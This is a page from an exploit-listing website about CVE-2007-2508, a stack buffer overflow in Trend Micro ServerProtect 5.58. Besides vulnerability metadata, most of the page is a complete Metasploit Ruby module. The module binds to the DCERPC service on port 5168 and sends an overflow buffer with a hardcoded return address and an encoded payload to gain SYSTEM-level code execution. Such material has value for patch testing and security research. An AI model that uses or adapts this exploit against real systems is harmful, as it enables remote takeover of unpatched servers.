Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow - exploit.company
header-logo
Suggest Exploit
vendor:
ServerProtect
by:
MC
7.5
CVSS
HIGH
Stack-based Buffer Overflow
119
CWE
Product Name: ServerProtect
Affected Version From: 5.58
Affected Version To: 5.58
Patch Exists: NO
Related CWE: CVE-2007-2508
CPE: a:trendmicro:serverprotect:5.58
Metasploit:
Other Scripts:
Platforms Tested: Windows
2007

Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow

This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.

Mitigation:

Apply the latest security patches provided by the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23868/info

Trend Micro ServerProtect is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows attackers to execute arbitrary machine code with SYSTEM-level privileges and to completely compromise affected computers. Failed exploit attempts will result in a denial of service.

##
# $Id: trendmicro_serverprotect_createbinding.rb 5100 2007-09-10 01:01:20Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Antivirus::Trendmicro_Serverprotect_Createbinding < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
				By sending a specially crafted RPC request, an attacker could overflow the
				buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 5100 $',
			'References'     =>
				[
					['BID', '23868'],
					['CVE', '2007-2508'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x65675aa8 } ], # pop esi; pop ecx; ret - StRpcSrv.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 7 2007'))
			
			register_options( [ Opt::RPORT(5168) ], self.class )
	end

	def exploit
		connect
		handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")

		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		filler =  rand_text_alpha(360) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
		filler << [target.ret].pack('V') + payload.encoded
		filler << rand_text_english(1400 - payload.encoded.length)

		len    = filler.length
		
		sploit = NDR.long(0x001f0002) + NDR.long(len) + filler + NDR.long(len)

		print_status("Trying target #{target.name}...")
			
			begin
				dcerpc_call(0, sploit)
				rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			end
		
		handler
		disconnect
	end

end
end